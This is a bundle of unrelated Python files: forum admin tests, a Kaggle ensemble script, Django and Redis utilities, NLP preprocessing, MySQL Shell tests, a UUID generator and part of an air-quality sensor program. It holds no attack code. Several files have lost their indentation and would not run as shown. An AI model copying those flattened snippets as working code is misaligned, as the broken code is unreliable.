reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk}),
data={
"name": "Test Category Edited",
"new_parent": root.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 3), (test_category, 1, 4, 5)]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category Edited")
response = self.client.post(
reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk}),
data={
"name": "Test Category Edited",
"new_parent": first_category.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 5), (test_category, 2, 3, 4)]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category Edited")
def test_editing_category_invalidates_acl_cache(self):
root = Category.objects.root_category()
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
test_category = Category.objects.get(slug="test-category")
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse(
"misago:admin:categories:edit", kwargs={"pk": test_category.pk}
),
data={
"name": "Test Category Edited",
"new_parent": root.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
def test_move_views(self):
"""move up/down views have no showstoppers"""
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category A",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
category_a = Category.objects.get(slug="category-a")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category B",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
category_b = Category.objects.get(slug="category-b")
response = self.client.post(
reverse("misago:admin:categories:up", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_b, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:up", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(category_b, 1, 2, 3),
(first_category, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_b, 1, 4, 5),
(category_a, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_a, 1, 4, 5),
(category_b, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:down", kwargs={"pk": category_b.pk})
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(category_a, 1, 4, 5),
(category_b, 1, 6, 7),
]
)
class CategoryAdminDeleteViewTests(CategoryAdminTestCase):
def setUp(self):
"""
Create categories tree for test cases:
First category (created by migration)
Category A
+ Category B
+ Subcategory C
+ Subcategory D
Category E
+ Category F
"""
super().setUp()
self.root = Category.objects.root_category()
self.first_category = Category.objects.get(slug="first-category")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category A",
"new_parent": self.root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category E",
"new_parent": self.root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_a = Category.objects.get(slug="category-a")
self.category_e = Category.objects.get(slug="category-e")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category B",
"new_parent": self.category_a.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_b = Category.objects.get(slug="category-b")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Subcategory C",
"new_parent": self.category_b.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_c = Category.objects.get(slug="subcategory-c")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Subcategory D",
"new_parent": self.category_b.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_d = Category.objects.get(slug="subcategory-d")
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Category F",
"new_parent": self.category_e.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.category_f = Category.objects.get(slug="category-f")
def test_delete_category_move_contents(self):
"""category was deleted and its contents were moved"""
for _ in range(10):
test.post_thread(self.category_b)
self.assertEqual(Thread.objects.count(), 10)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_b.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_b.pk}
),
data={
"move_children_to": self.category_e.pk,
"move_threads_to": self.category_d.pk,
},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 6)
self.assertEqual(Thread.objects.count(), 10)
for thread in Thread.objects.all():
self.assertEqual(thread.category_id, self.category_d.pk)
self.assertValidTree(
[
(self.root, 0, 1, 14),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 5),
(self.category_e, 1, 6, 13),
(self.category_f, 2, 7, 8),
(self.category_c, 2, 9, 10),
(self.category_d, 2, 11, 12),
]
)
def test_delete_category_and_contents(self):
"""category and its contents were deleted"""
for _ in range(10):
test.post_thread(self.category_b)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_b.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_b.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 4)
self.assertEqual(Thread.objects.count(), 0)
self.assertValidTree(
[
(self.root, 0, 1, 10),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 5),
(self.category_e, 1, 6, 9),
(self.category_f, 2, 7, 8),
]
)
def test_delete_leaf_category_and_contents(self):
"""leaf category was deleted with contents"""
for _ in range(10):
test.post_thread(self.category_d)
self.assertEqual(Thread.objects.count(), 10)
response = self.client.get(
reverse("misago:admin:categories:delete", kwargs={"pk": self.category_d.pk})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_d.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Category.objects.all_categories().count(), 6)
self.assertEqual(Thread.objects.count(), 0)
self.assertValidTree(
[
(self.root, 0, 1, 14),
(self.first_category, 1, 2, 3),
(self.category_a, 1, 4, 9),
(self.category_b, 2, 5, 8),
(self.category_c, 3, 6, 7),
(self.category_e, 1, 10, 13),
(self.category_f, 2, 11, 12),
]
)
def test_deleting_category_invalidates_acl_cache(self):
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse(
"misago:admin:categories:delete", kwargs={"pk": self.category_d.pk}
),
data={"move_children_to": "", "move_threads_to": ""},
)
|
import pandas as pd
import numpy as np
from glob import glob
import argparse
import os
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--sub-dir', type=str, default='./subs')
args, _ = parser.parse_known_args()
return args
if __name__ == '__main__':
args = parse_args()
subs = [pd.read_csv(csv) for csv in sorted(glob(os.path.join(args.sub_dir, '*csv')))]
sub_probs = [sub.target.rank(pct=True).values for sub in subs]
wts = [1/18]*18
assert len(wts)==len(sub_probs)
sub_ens = np.sum([wts[i]*sub_probs[i] for i in range(len(wts))],axis=0)
df_sub = subs[0]
df_sub['target'] = sub_ens
df_sub.to_csv(f"final_sub1.csv",index=False)
|
# Generated by Django 4.0.1 on 2022-02-04 13:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Clients', '0001_initial'),
('Organizations', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='clientcard',
name='organization',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='organization_client_card', to='Organizations.organization', verbose_name='Organization'),
),
migrations.AddField(
model_name='client',
name='organization',
field=models.ManyToManyField(related_name='organization_clients', to='Organizations.Organization', verbose_name='Organization'),
),
migrations.AlterUniqueTogether(
name='clientcard',
unique_together={('organization', 'phone')},
),
]
|
import os
import logging
from pathlib import Path
from typing import List, Optional
from redis import Redis
from photon.common.redis_semaphore import ParamsNT, Semaphore
from photon.common.config_context_common import ConfigContextCommon
class RedisCommon(object):
"""
Wrapper class for accessing Redis.
"""
def __init__(self, config: ConfigContextCommon) -> None:
"""
Args:
config: A config object.
"""
logname = Path(__file__).stem
self._logger = logging.getLogger(f"{config.PACKAGE_NAME}.{logname}")
redis_host = os.environ.get("REDISHOST", "localhost")
redis_port = int(os.environ.get("REDISPORT", 6379))
self._redis = Redis(host=redis_host, port=redis_port)
self._app_key = f"app:{config.PACKAGE_NICKNAME}"
self._semaphores: List[Semaphore] = []
def get_semaphore(self, name: str = "default") -> Semaphore:
"""
Initialize a redis-based distributed multi-process/multi-thread
Semaphore object for the calling thread.
Args:
name: The shared name of the semaphore.
Returns:
A Semaphore object for acquire() & release() or use as a context mgr (with).
"""
app_sem_key = f"{self._app_key}.semaphore:{name}"
semaphore = Semaphore(self._redis, name=app_sem_key)
self._semaphores.append(semaphore)
return semaphore
def get_semaphore_params(self, name: str = "default") -> Optional[ParamsNT]:
"""
Proxy to Semaphore get_params() static method
"""
return Semaphore.get_params(self._redis, name=name)
def set_semaphore_params(
self,
name: str = "default",
capacity: int = 100,
timeoutms: int = 10 * 60 * 1000,
decay: float = 0.95,
sleepms: int = 100,
) -> None:
"""
Proxy to Semaphore set_params() static method
"""
Semaphore.set_params(
self._redis,
name=name,
capacity=capacity,
timeoutms=timeoutms,
sleepms=sleepms,
decay=decay,
)
def failfast(self) -> None:
"""
Upon a failfast event, an app should call this method, e.g. in its failfast.py,
to explicitly delete any traces of its semaphores in redis.
"""
for semaphore in self._semaphores:
try:
semaphore.failfast()
except Exception:
pass
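# A minimal usage sketch (added, not part of the module). It assumes a reachable
# Redis at REDISHOST:REDISPORT and fakes the config object with a SimpleNamespace
# providing the two attributes this class reads (PACKAGE_NAME, PACKAGE_NICKNAME).
if __name__ == "__main__":
    from types import SimpleNamespace

    demo_config = SimpleNamespace(PACKAGE_NAME="demo", PACKAGE_NICKNAME="demo")
    redis_common = RedisCommon(demo_config)  # type: ignore[arg-type]
    with redis_common.get_semaphore("worker-pool"):
        # The Semaphore acquires on entry and releases on exit, per its docstring;
        # capacity and timeout come from set_semaphore_params() or the defaults.
        print("inside the distributed semaphore")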
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from itertools import zip_longest
def replace_oovs(source_in, target_in, vocabulary, source_out, target_out):
"""Replaces out-of-vocabulary words in source and target text with <unk-N>,
where N is the position of the word in the source sequence.
"""
def format_unk(pos):
return "<unk-{}>".format(pos)
if target_in is None:
target_in = []
for seq_num, (source_seq, target_seq) in enumerate(
zip_longest(source_in, target_in)
):
source_seq_out = []
target_seq_out = []
word_to_pos = dict()
for position, token in enumerate(source_seq.strip().split()):
if token in vocabulary:
token_out = token
else:
if token in word_to_pos:
oov_pos = word_to_pos[token]
else:
word_to_pos[token] = position
oov_pos = position
token_out = format_unk(oov_pos)
source_seq_out.append(token_out)
source_out.write(" ".join(source_seq_out) + "\n")
if target_seq is not None:
for token in target_seq.strip().split():
if token in word_to_pos:
token_out = format_unk(word_to_pos[token])
else:
token_out = token
target_seq_out.append(token_out)
if target_out is not None:
target_out.write(" ".join(target_seq_out) + "\n")
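# A worked example (added, not part of the original script), using in-memory
# streams; kept commented out so nothing runs when the script is executed:
#
#     import io
#     src_in = io.StringIO("the cat sat on the cat\n")
#     src_out = io.StringIO()
#     replace_oovs(src_in, None, {"the", "sat"}, src_out, None)
#     src_out.getvalue()  # -> "the <unk-1> sat <unk-3> the <unk-1>\n"
#
# "cat" is out of vocabulary, so every occurrence becomes <unk-1>, the position of
# its first appearance in the source sequence; "on" gets its own position, <unk-3>.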
def main():
parser = argparse.ArgumentParser(
description="Replaces out-of-vocabulary words in both source and target "
"sequences with tokens that indicate the position of the word "
"in the source sequence."
)
parser.add_argument(
"--source", type=str, help="text file with source sequences", required=True
)
parser.add_argument(
"--target", type=str, help="text file with target sequences", default=None
)
parser.add_argument("--vocab", type=str, help="vocabulary file", required=True)
parser.add_argument(
"--source-out",
type=str,
help="where to write source sequences with <unk-N> entries",
required=True,
)
parser.add_argument(
"--target-out",
type=str,
help="where to write target sequences with <unk-N> entries",
default=None,
)
args = parser.parse_args()
with open(args.vocab, encoding="utf-8") as vocab:
vocabulary = vocab.read().splitlines()
target_in = (
open(args.target, "r", encoding="utf-8") if args.target is not None else None
)
target_out = (
open(args.target_out, "w", encoding="utf-8")
if args.target_out is not None
else None
)
with open(args.source, "r", encoding="utf-8") as source_in, open(
args.source_out, "w", encoding="utf-8"
) as source_out:
replace_oovs(source_in, target_in, vocabulary, source_out, target_out)
if target_in is not None:
target_in.close()
if target_out is not None:
target_out.close()
if __name__ == "__main__":
main()
|
s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
# Project Euler 8: greatest product of 13 adjacent digits in the 1000-digit number above
# (start/end mark an inclusive 13-digit window).
nums = [int(c) for c in s]
start = 0
end = 12
max_prod = 0
prod = 1
while end < len(nums):
prod = 1
for i in range(start, end + 1):
prod *= nums[i]
if prod > max_prod:
max_prod = prod
start += 1
end += 1
print(max_prod)
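# Cross-check (added, not in the original script): the same maximum computed with
# math.prod over every 13-digit window; assumes Python 3.8+ for math.prod.
from math import prod
assert max_prod == max(prod(nums[i:i + 13]) for i in range(len(nums) - 12))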
|
# _base_ = './faster_rcnn_r50_fpn_1x_coco.py'
_base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
# fp16 settings
fp16 = dict(loss_scale=512.)
|
#!/usr/bin/env python
# encoding: utf-8
import gym
import gym_trivial
N_ITER = 10
if __name__ == "__main__":
env = gym.make("trivial-v0")
for i in range(N_ITER):
x = env.step(env.action_space.sample())
print(x)
|
from django.urls import path
from web.endpoint import views
urlpatterns = [
path('', views.HomeView.as_view(), name='home'),
path(r'upload/', views.UploadView.as_view(), name='upload'),
path(r'star/', views.StarView.as_view(), name='star'),
]
|
from .inventory_service import InventoryService, ReservationState, ReservationException
|
# Assumptions: validate_crud_functions available
# Assumes __uripwd is defined as <user>:<pwd>@<host>:<plugin_port>
from __future__ import print_function
from mysqlsh import mysqlx
mySession = mysqlx.get_session(__uripwd)
mySession.drop_schema('js_shell_test')
schema = mySession.create_schema('js_shell_test')
# Creates a test collection and inserts data into it
collection = schema.create_collection('collection1')
# ---------------------------------------------
# Collection.add Unit Testing: Dynamic Behavior
# ---------------------------------------------
#@ CollectionAdd: valid operations after add with no documents
crud = collection.add([])
validate_crud_functions(crud, ['add', 'execute'])
#@ CollectionAdd: valid operations after add
crud = collection.add({"_id":"sample", "name":"john", "age":17, "account": None})
validate_crud_functions(crud, ['add', 'execute'])
#@ CollectionAdd: valid operations after execute
result = crud.execute()
validate_crud_functions(crud, ['add', 'execute'])
# ---------------------------------------------
# Collection.add Unit Testing: Error Conditions
# ---------------------------------------------
#@# CollectionAdd: Error conditions on add
crud = collection.add()
crud = collection.add(45)
crud = collection.add(['invalid data'])
crud = collection.add(mysqlx.expr('5+1'))
crud = collection.add([{'name': 'sample'}, 'error']);
crud = collection.add({'name': 'sample'}, 'error');
# ---------------------------------------
# Collection.Add Unit Testing: Execution
# ---------------------------------------
#@<> Collection.add execution {VER(>=8.0.11)}
result = collection.add({ "name": 'document01', "Passed": 'document', "count": 1 }).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
EXPECT_EQ(1, len(result.generated_ids))
EXPECT_EQ(1, len(result.get_generated_ids()))
# WL11435_FR3_1
EXPECT_EQ(result.generated_ids[0], collection.find('name = "document01"').execute().fetch_one()._id);
id_prefix = result.generated_ids[0][:8]
#@<> WL11435_FR3_2 Collection.add execution, Single Known ID
result = collection.add({ "_id": "sample_document", "name": 'document02', "passed": 'document', "count": 1 }).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
EXPECT_EQ('sample_document', collection.find('name = "document02"').execute().fetch_one()._id);
#@ WL11435_ET1_1 Collection.add error no id {VER(<8.0.11)}
result = collection.add({'name': 'document03', 'Passed': 'document', 'count': 1 }).execute();
#@<> Collection.add execution, Multiple {VER(>=8.0.11)}
result = collection.add([{ "name": 'document03', "passed": 'again', "count": 2 }, { "name": 'document04', "passed": 'once again', "count": 3 }]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# WL11435_ET2_6
EXPECT_EQ(2, len(result.generated_ids))
EXPECT_EQ(2, len(result.get_generated_ids()))
# Verifies IDs have the same prefix
EXPECT_EQ(id_prefix, result.generated_ids[0][:8]);
EXPECT_EQ(id_prefix, result.generated_ids[1][:8]);
# WL11435_FR3_1 Verifies IDs are assigned in the expected order
EXPECT_EQ(result.generated_ids[0], collection.find('name = "document03"').execute().fetch_one()._id);
EXPECT_EQ(result.generated_ids[1], collection.find('name = "document04"').execute().fetch_one()._id);
# WL11435_ET2_2 Verifies IDs are sequential
EXPECT_TRUE(result.generated_ids[0] < result.generated_ids[1]);
#@<> WL11435_ET2_3 Collection.add execution, Multiple Known IDs
result = collection.add([{ "_id": "known_00", "name": 'document05', "passed": 'again', "count": 2 }, { "_id": "known_01", "name": 'document06', "passed": 'once again', "count": 3 }]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# WL11435_ET2_5
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
EXPECT_EQ('known_00', collection.find('name = "document05"').execute().fetch_one()._id);
EXPECT_EQ('known_01', collection.find('name = "document06"').execute().fetch_one()._id);
result = collection.add([]).execute()
EXPECT_EQ(-1, result.affected_item_count)
EXPECT_EQ(-1, result.affected_items_count)
EXPECT_EQ(0, len(result.generated_ids))
EXPECT_EQ(0, len(result.get_generated_ids()))
#@ Collection.add execution, Variations >=8.0.11 {VER(>=8.0.11)}
#! [CollectionAdd: Chained Calls]
result = collection.add({ "name": 'my fourth', "passed": 'again', "count": 4 }).add({ "name": 'my fifth', "passed": 'once again', "count": 5 }).execute()
print("Affected Rows Chained:", result.affected_items_count, "\n")
#! [CollectionAdd: Chained Calls]
#! [CollectionAdd: Using an Expression]
result = collection.add(mysqlx.expr('{"name": "my fifth", "passed": "document", "count": 1}')).execute()
print("Affected Rows Single Expression:", result.affected_items_count, "\n")
#! [CollectionAdd: Using an Expression]
#! [CollectionAdd: Document List]
result = collection.add([{ "name": 'my sexth', "passed": 'again', "count": 5 }, mysqlx.expr('{"name": "my senevth", "passed": "yep again", "count": 5}')]).execute()
print("Affected Rows Mixed List:", result.affected_items_count, "\n")
#! [CollectionAdd: Document List]
#! [CollectionAdd: Multiple Parameters]
result = collection.add({ "name": 'my eigth', "passed": 'yep', "count": 6 }, mysqlx.expr('{"name": "my nineth", "passed": "yep again", "count": 6}')).execute()
print("Affected Rows Multiple Params:", result.affected_items_count, "\n")
#! [CollectionAdd: Multiple Parameters]
#@<> Collection.add execution, Variations <8.0.11 {VER(<8.0.11)}
result = collection.add({'_id': '1E9C92FDA74ED311944E00059A3C7A44', "name": 'my fourth', "passed": 'again', "count": 4 }).add({'_id': '1E9C92FDA74ED311944E00059A3C7A45', "name": 'my fifth', "passed": 'once again', "count": 5 }).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
result = collection.add(mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A46", "name": "my fifth", "passed": "document", "count": 1}')).execute()
EXPECT_EQ(1, result.affected_item_count)
EXPECT_EQ(1, result.affected_items_count)
result = collection.add([{'_id': '1E9C92FDA74ED311944E00059A3C7A47', "name": 'my sexth', "passed": 'again', "count": 5 }, mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A48", "name": "my senevth", "passed": "yep again", "count": 5}')]).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
result = collection.add({'_id': '1E9C92FDA74ED311944E00059A3C7A49', "name": 'my eigth', "passed": 'yep', "count": 6 }, mysqlx.expr('{"_id": "1E9C92FDA74ED311944E00059A3C7A4A", "name": "my nineth", "passed": "yep again", "count": 6}')).execute()
EXPECT_EQ(2, result.affected_item_count)
EXPECT_EQ(2, result.affected_items_count)
# Cleanup
mySession.drop_schema('js_shell_test')
mySession.close()
|
# Defines an effect: holds goal patterns, effect patterns, probabilities and values as parallel lists.
class Effects:
    def __init__(self):
        self.goalPatternList = []
        self.effectPatternList = []
        self.probList = []
        self.valueList = []
    def printInfo(self):
        print("values:", self.valueList)
        print("probs:", self.probList)
        print("effectList:", self.effectPatternList)
        print("goalPatternList:", self.goalPatternList)
|
import mock
from rest_framework import status
from rest_framework.test import APITestCase
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
DEFAULT_ACCEPT = (
'text/html,application/xhtml+xml,application/xml;q=0.9,'
'image/webp,image/apng,*/*;q=0.8'
)
class SearchRendererTests(APITestCase):
@mock.patch('complaint_search.es_interface.search')
def test_search_no_format_chrome_request(self, mock_essearch):
expected = {'foo': 'bar'}
mock_essearch.return_value = expected
url = reverse('complaint_search:search')
response = self.client.get(url, HTTP_ACCEPT=DEFAULT_ACCEPT)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(expected, response.data)
self.assertEqual(response['Content-Type'], 'application/json')
@mock.patch('complaint_search.es_interface.search')
def test_search_accept_html_only(self, mock_essearch):
expected = {'foo': 'bar'}
mock_essearch.return_value = expected
accept = 'text/html'
url = reverse('complaint_search:search')
response = self.client.get(url, HTTP_ACCEPT=accept)
self.assertEqual(response.status_code, 406)
self.assertEqual(response['Content-Type'], 'application/json')
|
import redis
def sigmaActions(occur):
    '''
    Push an action record onto the Redis 'actions' list, capped at the most
    recent entries. Every small step counts.
    '''
    cpool = redis.ConnectionPool(host='localhost',
                                 port=6379,
                                 decode_responses=True,
                                 db=0)
    r = redis.Redis(connection_pool=cpool)
    r.lpush('actions', occur)
    # cap the list: ltrim(0, 9999) keeps only the 10000 most recent records
    if r.llen('actions') > 9999:
        r.ltrim('actions', 0, 9999)
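# Minimal usage sketch (assumed, not part of the original module): requires a
# Redis server listening on localhost:6379.
if __name__ == "__main__":
    sigmaActions("2021-08-31T12:00:00 example_action")
    r = redis.Redis(host='localhost', port=6379, decode_responses=True, db=0)
    print(r.lrange('actions', 0, 4))  # the five most recent action records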
|
# Copyright (2013) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government
# retains certain rights in this software.
#
# This software is released under the FreeBSD license as described
# in License.txt
import time
import random
import _gui
import json # Python 2.6 or later
def run():
uuid = ""
# skip 'E' because it causes issues by trying to interpret a string as a number
# 0123456789012345678901234
sLetters = "ABCDFGHIJKLMNOPQRSTUVWXYZ"
# get the number of milliseconds since Jan 1 1970 (epoch)
nTime = int(1000 * time.time())
sTime = str(nTime)
    # convert each digit of the timestamp into a letter (digits 0-9 map to A-K, with 'E' skipped)
for i in range(0, len(sTime)):
n = int(sTime[i])
uuid = uuid + sLetters[n]
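    # nTime currently has 13 digits (milliseconds since the epoch), so the
    # prefix built above is 13 letters long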
#
# add 16 random letters from the list of 25 above
sRandom = ""
for i in range(0, 16):
nRandom = int(25 * random.random())
sRandom += sLetters[nRandom]
#
uuid += sRandom
return uuid
def main():
_gui.setHost()
for req in _gui.getRequests():
sDb = _gui.getQuery(req, "db")
_gui.setDatabase(sDb)
sCount = _gui.getQuery(req, "count", "1")
nCount = int(sCount)
uuids = []
for iCount in range(0, nCount):
sUuid = run()
uuids.append(sUuid)
if nCount == 1:
_gui.respondJSON(json.dumps({"uuid": sUuid}))
else:
_gui.respondJSON(json.dumps({"uuids": uuids}))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
'''
@attention:
sudo apt-get install python3-pip
sudo pip3 install --upgrade setuptools
sudo pip3 install smbus
sudo pip3 install smbus2
sudo pip3 install unicornhatmini
sudo pip3 install bme680
sudo pip3 install pimoroni-sgp30
sudo pip3 install rv3028
sudo python3 diyzeniaq.py
@bug: Beta!
@summary: DIYzenIAQ
@see: https://work.saraceni.org/airquality/
@author: Andrea Saraceni
@contact: https://twitter.com/saraceni_andrea/
@license: MIT
@date: 31.08.2021
@version: 0.9.1
'''
from subprocess import call
from threading import Thread
import math, os, sys, time
import rv3028
import bme680
from sgp30 import SGP30
from unicornhatmini import UnicornHATMini
from gpiozero import Button
class DIYzenIAQ:
def __init__(self):
try:
self.unicornhatmini = UnicornHATMini()
self.unicornhatmini.clear()
self.unicornhatmini.set_brightness(0.02)
self.unicornhatmini.set_rotation(0)
self.button_a = Button(5)
self.button_b = Button(6)
self.button_x = Button(16)
self.button_y = Button(24)
self.button_mode = 0
self.rtc = rv3028.RV3028()
self.rtc.set_battery_switchover("level_switching_mode")
self.rtc_now = None
self.bme680_data = bme680.BME680(0x77)
self.bme680_data.set_humidity_oversample(bme680.OS_2X) # bme680.OS_16X
self.bme680_data.set_temperature_oversample(bme680.OS_8X) # bme680.OS_16X
self.bme680_data.set_filter(bme680.FILTER_SIZE_3)
self.bme680_data.set_gas_status(bme680.ENABLE_GAS_MEAS)
self.bme680_data.set_gas_heater_temperature(320)
self.bme680_data.set_gas_heater_duration(150)
self.bme680_data.select_gas_heater_profile(0)
self.bme680_burn_in_time = 360 # 6 minutes = 360
self.bme680_humidity_baseline = 45.0 # optimal humidity value 40.0
self.bme680_humidity_weighting = 0.25 # humidity 25 : gas 75
self.bme680_gas_baseline = self.bme680_aqs = self.bme680_temperature = self.bme680_humidity = self.bme680_gas = 0
self.bme680_start_time = self.bme680_curr_time = time.time() # self.bme680_start_time = self.bme680_end_time = self.bme680_curr_time = time.time()
self.burn_in_mode = 0
self.sgp30 = SGP30()
self.data_sgp30_equivalent_co2 = self.data_sgp30_total_voc = 0
self.press_act = 1
self.led_act = 0
self.the_rgb = (0, 0, 0)
self.led_brightness_1 = (
(0, 0, 0, 0, 0), # (0.21, 0.21, 0.21, 0.21, 0.21),
(0, 0, 0, 0, 0), # (0.09, 0.21, 0.18, 0.12, 0.09),
(0, 0, 0, 0, 0), # (0.09, 0.21, 0.18, 0.12, 0.09),
(0.21, 0.18, 0.15, 0.12, 0.09),
(0.21, 0.18, 0.15, 0.12, 0.09),
(0.09, 0.12, 0.15, 0.18, 0.21))
self.led_brightness_2 = 0
self.the_elements = ("time", "temperature", "humidity", "eCO2", "TVOC", "VOC IAQ")
self.the_elements_range = (
(600, 1200, 1800, 2400),
(10, 16, 28, 35),
(20, 40, 60, 90),
(500, 1000, 1600, 2000),
(120, 220, 660, 2200),
(20, 40, 60, 80))
self.the_elements_palette_1 = (
((232, 129, 127), (195, 114, 124), (141, 82, 115), (90, 51, 110), (49, 31, 98)),
(
((0, 0, 255), (0, 100, 255)),
((0, 200, 255), (0, 255, 255)),
((0, 255, 0), (100, 255, 0)),
((255, 255, 0), (255, 200, 0)),
((255, 100, 0), (255, 0, 0))
),
(
((255, 100, 0), (255, 0, 0)),
((255, 255, 0), (255, 200, 0)),
((0, 255, 0), (100, 255, 0)),
((0, 200, 255), (0, 255, 255)),
((0, 0, 255), (0, 100, 255))
),
((0, 255, 0), (128, 255, 0), (255, 255, 0), (255, 128, 0), (255, 0, 0)),
((0, 255, 0), (128, 255, 0), (255, 255, 0), (255, 128, 0), (255, 0, 0)),
((255, 0, 0), (255, 128, 0), (255, 255, 0), (128, 255, 0), (0, 255, 0)))
except (KeyboardInterrupt, SystemExit):
self.unicornhatmini.clear()
self.button_a.close()
self.button_b.close()
self.button_x.close()
self.button_y.close()
print("*** Button close ***")
except Exception as e:
print("*** ERROR init: {0} ***".format(str(e)))
raise
else: self.fn_thread_go()
def fn_rv3028(self):
while True:
self.rtc_now = self.rtc.get_time_and_date()
# print("*** TIME DATE *** {:02d}:{:02d}:{:02d} *** {:02d}/{:02d}/{:02d} ***".format(self.rtc_now.hour, self.rtc_now.minute, self.rtc_now.second, self.rtc_now.day, self.rtc_now.month, self.rtc_now.year))
time.sleep(1)
